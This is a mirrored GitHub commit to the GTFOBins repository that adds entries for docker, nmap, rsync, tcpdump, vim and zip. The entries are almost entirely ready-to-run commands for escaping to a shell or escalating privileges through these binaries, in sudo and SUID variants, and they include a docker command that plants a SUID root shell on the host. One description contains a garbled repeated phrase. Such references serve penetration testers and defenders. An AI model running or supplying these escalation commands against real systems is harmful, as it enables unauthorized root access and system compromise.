mirror of
https://github.com/GTFOBins/GTFOBins.github.io
synced 2024-12-25 14:30:07 +01:00
Add: docker, nmap, rsync, tcpdump, vim and zip
This commit is contained in:
commit
edd7fec5ff
19
_gtfobins/docker.md
Normal file
19
_gtfobins/docker.md
Normal file
@ -0,0 +1,19 @@
|
||||
---
|
||||
description: |
|
||||
Exploit the fact that Docker runs as root to create a SUID binary on the host using a container. This requires the user to be privileged enough to run docker, i.e., being in the `docker` group.
|
||||
|
||||
This creates a SUID shell in the guest file system. Any other Linux images should work, e.g., `debian`.
|
||||
functions:
|
||||
execute-interactive:
|
||||
- code: |
|
||||
docker run --rm -v /home/$USER:/h_docs ubuntu \
|
||||
sh -c 'cp /bin/sh /h_docs/sh && chmod +s /h_docs/sh' && ~/sh -p
|
||||
sudo-enabled:
|
||||
- code: |
|
||||
sudo docker run --rm -v /home/$USER:/h_docs ubuntu \
|
||||
sh -c 'cp /bin/sh /h_docs/sh && chmod +s /h_docs/sh' && ~/sh -p
|
||||
suid-enabled:
|
||||
- code: |
|
||||
./docker run --rm -v /home/$USER:/h_docs ubuntu \
|
||||
sh -c 'cp /bin/sh /h_docs/sh && chmod +s /h_docs/sh' && ~/sh -p
|
||||
---
|
18
_gtfobins/nmap.md
Normal file
18
_gtfobins/nmap.md
Normal file
@ -0,0 +1,18 @@
|
||||
---
|
||||
functions:
|
||||
execute-non-interactive:
|
||||
- description: Echoing of input characters3ers is disabled.
|
||||
code: |
|
||||
echo 'os.execute("/bin/sh")' > /tmp/script.nse
|
||||
nmap --script=/tmp/script.nse
|
||||
sudo-enabled:
|
||||
- description: Echoing of input characters3ers is disabled.
|
||||
code: |
|
||||
echo 'os.execute("/bin/sh")' > /tmp/script.nse
|
||||
sudo nmap --script=/tmp/script.nse
|
||||
suid-enabled:
|
||||
- description: Echoing of input characters3ers is disabled.
|
||||
code: |
|
||||
echo 'os.execute("/bin/sh -p")' > /tmp/script.nse
|
||||
./nmap --script=/tmp/script.nse
|
||||
---
|
9
_gtfobins/rsync.md
Normal file
9
_gtfobins/rsync.md
Normal file
@ -0,0 +1,9 @@
|
||||
---
|
||||
functions:
|
||||
execute-interactive:
|
||||
- code: rsync -e 'bash -c "exec 10<&0 11>&1 0<&2 1>&2; sh -i"' 127.0.0.1:/dev/null
|
||||
sudo-enabled:
|
||||
- code: sudo rsync -e 'bash -c "exec 10<&0 11>&1 0<&2 1>&2; sh -i"' 127.0.0.1:/dev/null
|
||||
suid-enabled:
|
||||
- code: ./rsync -e 'bash -p -c "exec 10<&0 11>&1 0<&2 1>&2; sh -i"' 127.0.0.1:/dev/null
|
||||
---
|
17
_gtfobins/tcpdump.md
Normal file
17
_gtfobins/tcpdump.md
Normal file
@ -0,0 +1,17 @@
|
||||
---
|
||||
functions:
|
||||
execute-non-interactive:
|
||||
- code: |
|
||||
COMMAND='id > /tmp/output'
|
||||
TF=$(mktemp -u)
|
||||
echo "$COMMAND" > $TF
|
||||
chmod +x $TF
|
||||
tcpdump -ln -i lo -w /dev/null -W 1 -G 1 -z $TF
|
||||
suid-enabled:
|
||||
- code: |
|
||||
COMMAND='id > /tmp/output'
|
||||
TF=$(mktemp -u)
|
||||
echo "$COMMAND" > $TF
|
||||
chmod +x $TF
|
||||
sudo tcpdump -ln -i lo -w /dev/null -W 1 -G 1 -z $TF
|
||||
---
|
19
_gtfobins/vim.md
Normal file
19
_gtfobins/vim.md
Normal file
@ -0,0 +1,19 @@
|
||||
---
|
||||
functions:
|
||||
execute-interactive:
|
||||
- code: vim -c ':!/bin/sh'
|
||||
- code: |
|
||||
vim
|
||||
:set shell=/bin/sh
|
||||
:shell
|
||||
file-write:
|
||||
- code: |
|
||||
vim file_to_write
|
||||
w
|
||||
file-read:
|
||||
- code: vim file_to_read
|
||||
suid-enabled:
|
||||
- code: ./vim -c ':!/bin/sh -p'
|
||||
sudo-enabled:
|
||||
- code: sudo vim -c ':!/bin/sh'
|
||||
---
|
15
_gtfobins/zip.md
Normal file
15
_gtfobins/zip.md
Normal file
@ -0,0 +1,15 @@
|
||||
---
|
||||
functions:
|
||||
execute-interactive:
|
||||
- code: |
|
||||
zip /tmp/x.zip /etc/hosts -T -TT 'sh #'
|
||||
rm /tmp/x.zip
|
||||
sudo-enabled:
|
||||
- code: |
|
||||
sudo zip /tmp/x.zip /etc/hosts -T -TT 'sh #'
|
||||
sudo rm /tmp/x.zip
|
||||
suid-limited:
|
||||
- code: |
|
||||
./zip /tmp/x.zip /etc/hosts -T -TT 'sh #'
|
||||
sudo rm /tmp/x.zip
|
||||
---
|
Loading…
Reference in New Issue
Block a user